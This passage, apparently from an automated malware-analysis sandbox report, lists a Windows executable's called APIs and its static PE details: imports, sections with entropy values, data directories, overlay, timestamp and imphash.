  1258.     "msvcrt.dll._strlwr",
  1259.     "msvcrt.dll.__getmainargs",
  1260.     "msvcrt.dll.__p__environ",
  1261.     "msvcrt.dll.__p__fmode",
  1262.     "msvcrt.dll.__set_app_type",
  1263.     "msvcrt.dll._cexit",
  1264.     "msvcrt.dll._iob",
  1265.     "msvcrt.dll._onexit",
  1266.     "msvcrt.dll._setmode",
  1267.     "msvcrt.dll.abort",
  1268.     "msvcrt.dll.atexit",
  1269.     "msvcrt.dll.atoi",
  1270.     "msvcrt.dll.exit",
  1271.     "msvcrt.dll.fclose",
  1272.     "msvcrt.dll.fflush",
  1273.     "msvcrt.dll.fopen",
  1274.     "msvcrt.dll.fprintf",
  1275.     "msvcrt.dll.fread",
  1276.     "msvcrt.dll.free",
  1277.     "msvcrt.dll.fwrite",
  1278.     "msvcrt.dll.malloc",
  1279.     "msvcrt.dll.memcpy",
  1280.     "msvcrt.dll.memmove",
  1281.     "msvcrt.dll.memset",
  1282.     "msvcrt.dll.signal",
  1283.     "msvcrt.dll.strcat",
  1284.     "msvcrt.dll.strcmp",
  1285.     "msvcrt.dll.strcpy",
  1286.     "msvcrt.dll.strlen",
  1287.     "msvcrt.dll.strncat",
  1288.     "shell32.dll.ShellExecuteExA",
  1289.     "user32.dll.GetSystemMetrics",
  1290.     "wsock32.dll.WSACleanup",
  1291.     "wsock32.dll.WSAStartup",
  1292.     "wsock32.dll.closesocket",
  1293.     "wsock32.dll.connect",
  1294.     "wsock32.dll.gethostbyname",
  1295.     "wsock32.dll.htons",
  1296.     "wsock32.dll.inet_addr",
  1297.     "wsock32.dll.inet_ntoa",
  1298.     "wsock32.dll.recv",
  1299.     "wsock32.dll.send",
  1300.     "wsock32.dll.socket",
  1301.     "shell32.dll.#680",
  1302.     "kernel32.dll.GetNativeSystemInfo",
  1303.     "kernel32.dll.SortGetHandle",
  1304.     "kernel32.dll.SortCloseHandle"
  1305. ]
  1306.  
  1307. [*] Static Analysis: {
  1308.     "pe": {
  1309.         "peid_signatures": null,
  1310.         "imports": [
  1311.             {
  1312.                 "imports": [
  1313.                     {
  1314.                         "name": "VirtualAllocEx",
  1315.                         "address": "0x41d00c"
  1316.                     },
  1317.                     {
  1318.                         "name": "GetCommandLineW",
  1319.                         "address": "0x41d010"
  1320.                     },
  1321.                     {
  1322.                         "name": "GetOEMCP",
  1323.                         "address": "0x41d014"
  1324.                     },
  1325.                     {
  1326.                         "name": "GetCommandLineA",
  1327.                         "address": "0x41d018"
  1328.                     },
  1329.                     {
  1330.                         "name": "GetProcAddress",
  1331.                         "address": "0x41d01c"
  1332.                     },
  1333.                     {
  1334.                         "name": "LoadLibraryA",
  1335.                         "address": "0x41d020"
  1336.                     },
  1337.                     {
  1338.                         "name": "GetLastError",
  1339.                         "address": "0x41d024"
  1340.                     },
  1341.                     {
  1342.                         "name": "GetModuleHandleA",
  1343.                         "address": "0x41d028"
  1344.                     },
  1345.                     {
  1346.                         "name": "GetCurrentProcess",
  1347.                         "address": "0x41d02c"
  1348.                     },
  1349.                     {
  1350.                         "name": "GetProcessHeap",
  1351.                         "address": "0x41d030"
  1352.                     },
  1353.                     {
  1354.                         "name": "InterlockedIncrement",
  1355.                         "address": "0x41d034"
  1356.                     },
  1357.                     {
  1358.                         "name": "lstrlenA",
  1359.                         "address": "0x41d038"
  1360.                     },
  1361.                     {
  1362.                         "name": "GetVersionExA",
  1363.                         "address": "0x41d03c"
  1364.                     },
  1365.                     {
  1366.                         "name": "GetVersionExW",
  1367.                         "address": "0x41d040"
  1368.                     },
  1369.                     {
  1370.                         "name": "InterlockedDecrement",
  1371.                         "address": "0x41d044"
  1372.                     },
  1373.                     {
  1374.                         "name": "GetCurrentThread",
  1375.                         "address": "0x41d048"
  1376.                     },
  1377.                     {
  1378.                         "name": "GetTickCount",
  1379.                         "address": "0x41d04c"
  1380.                     },
  1381.                     {
  1382.                         "name": "GetStartupInfoW",
  1383.                         "address": "0x41d050"
  1384.                     }
  1385.                 ],
  1386.                 "dll": "KERNEL32.dll"
  1387.             },
  1388.             {
  1389.                 "imports": [
  1390.                     {
  1391.                         "name": "DestroyWindow",
  1392.                         "address": "0x41d058"
  1393.                     },
  1394.                     {
  1395.                         "name": "RegisterClassW",
  1396.                         "address": "0x41d05c"
  1397.                     },
  1398.                     {
  1399.                         "name": "LoadIconA",
  1400.                         "address": "0x41d060"
  1401.                     },
  1402.                     {
  1403.                         "name": "SetWindowLongW",
  1404.                         "address": "0x41d064"
  1405.                     },
  1406.                     {
  1407.                         "name": "SetWindowTextW",
  1408.                         "address": "0x41d068"
  1409.                     },
  1410.                     {
  1411.                         "name": "DefWindowProcW",
  1412.                         "address": "0x41d06c"
  1413.                     },
  1414.                     {
  1415.                         "name": "CreateWindowExA",
  1416.                         "address": "0x41d070"
  1417.                     },
  1418.                     {
  1419.                         "name": "DestroyIcon",
  1420.                         "address": "0x41d074"
  1421.                     },
  1422.                     {
  1423.                         "name": "SendMessageW",
  1424.                         "address": "0x41d078"
  1425.                     },
  1426.                     {
  1427.                         "name": "CreateWindowExW",
  1428.                         "address": "0x41d07c"
  1429.                     },
  1430.                     {
  1431.                         "name": "UnregisterClassA",
  1432.                         "address": "0x41d080"
  1433.                     },
  1434.                     {
  1435.                         "name": "LoadStringW",
  1436.                         "address": "0x41d084"
  1437.                     },
  1438.                     {
  1439.                         "name": "PostMessageW",
  1440.                         "address": "0x41d088"
  1441.                     }
  1442.                 ],
  1443.                 "dll": "USER32.dll"
  1444.             },
  1445.             {
  1446.                 "imports": [
  1447.                     {
  1448.                         "name": "CreateDIBSection",
  1449.                         "address": "0x41d000"
  1450.                     },
  1451.                     {
  1452.                         "name": "CreateBitmap",
  1453.                         "address": "0x41d004"
  1454.                     }
  1455.                 ],
  1456.                 "dll": "GDI32.dll"
  1457.             },
  1458.             {
  1459.                 "imports": [
  1460.                     {
  1461.                         "name": "CoInitialize",
  1462.                         "address": "0x41d0d8"
  1463.                     },
  1464.                     {
  1465.                         "name": "CoGetObject",
  1466.                         "address": "0x41d0dc"
  1467.                     }
  1468.                 ],
  1469.                 "dll": "ole32.dll"
  1470.             },
  1471.             {
  1472.                 "imports": [
  1473.                     {
  1474.                         "name": "__setusermatherr",
  1475.                         "address": "0x41d090"
  1476.                     },
  1477.                     {
  1478.                         "name": "_c_exit",
  1479.                         "address": "0x41d094"
  1480.                     },
  1481.                     {
  1482.                         "name": "_except_handler3",
  1483.                         "address": "0x41d098"
  1484.                     },
  1485.                     {
  1486.                         "name": "_XcptFilter",
  1487.                         "address": "0x41d09c"
  1488.                     },
  1489.                     {
  1490.                         "name": "_cexit",
  1491.                         "address": "0x41d0a0"
  1492.                     },
  1493.                     {
  1494.                         "name": "exit",
  1495.                         "address": "0x41d0a4"
  1496.                     },
  1497.                     {
  1498.                         "name": "_wcmdln",
  1499.                         "address": "0x41d0a8"
  1500.                     },
  1501.                     {
  1502.                         "name": "__wgetmainargs",
  1503.                         "address": "0x41d0ac"
  1504.                     },
  1505.                     {
  1506.                         "name": "_initterm",
  1507.                         "address": "0x41d0b0"
  1508.                     },
  1509.                     {
  1510.                         "name": "_exit",
  1511.                         "address": "0x41d0b4"
  1512.                     },
  1513.                     {
  1514.                         "name": "_adjust_fdiv",
  1515.                         "address": "0x41d0b8"
  1516.                     },
  1517.                     {
  1518.                         "name": "__p__commode",
  1519.                         "address": "0x41d0bc"
  1520.                     },
  1521.                     {
  1522.                         "name": "__p__fmode",
  1523.                         "address": "0x41d0c0"
  1524.                     },
  1525.                     {
  1526.                         "name": "__set_app_type",
  1527.                         "address": "0x41d0c4"
  1528.                     },
  1529.                     {
  1530.                         "name": "_controlfp",
  1531.                         "address": "0x41d0c8"
  1532.                     },
  1533.                     {
  1534.                         "name": "__dllonexit",
  1535.                         "address": "0x41d0cc"
  1536.                     },
  1537.                     {
  1538.                         "name": "_onexit",
  1539.                         "address": "0x41d0d0"
  1540.                     }
  1541.                 ],
  1542.                 "dll": "msvcrt.dll"
  1543.             }
  1544.         ],
  1545.         "digital_signers": null,
  1546.         "exported_dll_name": null,
  1547.         "actual_checksum": "0x0001d0b3",
  1548.         "overlay": {
  1549.             "size": "0x00001f08",
  1550.             "offset": "0x0000c000"
  1551.         },
  1552.         "imagebase": "0x00400000",
  1553.         "reported_checksum": "0x0001d0b3",
  1554.         "icon_hash": null,
  1555.         "entrypoint": "0x00404636",
  1556.         "timestamp": "2016-08-19 14:55:52",
  1557.         "osversion": "4.0",
  1558.         "sections": [
  1559.             {
  1560.                 "name": ".text",
  1561.                 "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1562.                 "virtual_address": "0x00001000",
  1563.                 "size_of_data": "0x00004000",
  1564.                 "entropy": "5.74",
  1565.                 "raw_address": "0x00001000",
  1566.                 "virtual_size": "0x00003916",
  1567.                 "characteristics_raw": "0xf0000020"
  1568.             },
  1569.             {
  1570.                 "name": ".bss",
  1571.                 "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1572.                 "virtual_address": "0x00005000",
  1573.                 "size_of_data": "0x00000000",
  1574.                 "entropy": "0.00",
  1575.                 "raw_address": "0x00000000",
  1576.                 "virtual_size": "0x00017030",
  1577.                 "characteristics_raw": "0xc0000080"
  1578.             },
  1579.             {
  1580.                 "name": ".rdata",
  1581.                 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1582.                 "virtual_address": "0x0001d000",
  1583.                 "size_of_data": "0x00001000",
  1584.                 "entropy": "2.45",
  1585.                 "raw_address": "0x00005000",
  1586.                 "virtual_size": "0x000005dc",
  1587.                 "characteristics_raw": "0x40000040"
  1588.             },
  1589.             {
  1590.                 "name": ".data",
  1591.                 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1592.                 "virtual_address": "0x0001e000",
  1593.                 "size_of_data": "0x00005000",
  1594.                 "entropy": "6.48",
  1595.                 "raw_address": "0x00006000",
  1596.                 "virtual_size": "0x00004ef4",
  1597.                 "characteristics_raw": "0xd0000040"
  1598.             },
  1599.             {
  1600.                 "name": ".reloc",
  1601.                 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  1602.                 "virtual_address": "0x00023000",
  1603.                 "size_of_data": "0x00001000",
  1604.                 "entropy": "0.70",
  1605.                 "raw_address": "0x0000b000",
  1606.                 "virtual_size": "0x0000024e",
  1607.                 "characteristics_raw": "0x42000040"
  1608.             }
  1609.         ],
  1610.         "resources": [],
  1611.         "dirents": [
  1612.             {
  1613.                 "virtual_address": "0x00000000",
  1614.                 "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1615.                 "size": "0x00000000"
  1616.             },
  1617.             {
  1618.                 "virtual_address": "0x0001d104",
  1619.                 "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1620.                 "size": "0x00000078"
  1621.             },
  1622.             {
  1623.                 "virtual_address": "0x00000000",
  1624.                 "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1625.                 "size": "0x00000000"
  1626.             },
  1627.             {
  1628.                 "virtual_address": "0x00000000",
  1629.                 "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1630.                 "size": "0x00000000"
  1631.             },
  1632.             {
  1633.                 "virtual_address": "0x0000c000",
  1634.                 "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1635.                 "size": "0x00001f08"
  1636.             },
  1637.             {
  1638.                 "virtual_address": "0x00023000",
  1639.                 "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1640.                 "size": "0x0000011c"
  1641.             },
  1642.             {
  1643.                 "virtual_address": "0x00000000",
  1644.                 "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1645.                 "size": "0x00000000"
  1646.             },
  1647.             {
  1648.                 "virtual_address": "0x00000000",
  1649.                 "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1650.                 "size": "0x00000000"
  1651.             },
  1652.             {
  1653.                 "virtual_address": "0x00000000",
  1654.                 "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1655.                 "size": "0x00000000"
  1656.             },
  1657.             {
  1658.                 "virtual_address": "0x00000000",
  1659.                 "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1660.                 "size": "0x00000000"
  1661.             },
  1662.             {
  1663.                 "virtual_address": "0x00000000",
  1664.                 "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1665.                 "size": "0x00000000"
  1666.             },
  1667.             {
  1668.                 "virtual_address": "0x00000000",
  1669.                 "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1670.                 "size": "0x00000000"
  1671.             },
  1672.             {
  1673.                 "virtual_address": "0x0001d000",
  1674.                 "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1675.                 "size": "0x000000e4"
  1676.             },
  1677.             {
  1678.                 "virtual_address": "0x00000000",
  1679.                 "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1680.                 "size": "0x00000000"
  1681.             },
  1682.             {
  1683.                 "virtual_address": "0x00000000",
  1684.                 "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1685.                 "size": "0x00000000"
  1686.             },
  1687.             {
  1688.                 "virtual_address": "0x00000000",
  1689.                 "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1690.                 "size": "0x00000000"
  1691.             }
  1692.         ],
  1693.         "exports": [],
  1694.         "guest_signers": {},
  1695.         "imphash": "ed3432959df410bdf8d52780a8c0d1d3",
  1696.         "icon_fuzzy": null,
  1697.         "icon": null,
  1698.         "pdbpath": null,
  1699.         "imported_dll_count": 5,
  1700.         "versioninfo": []
  1701.     }
  1702. }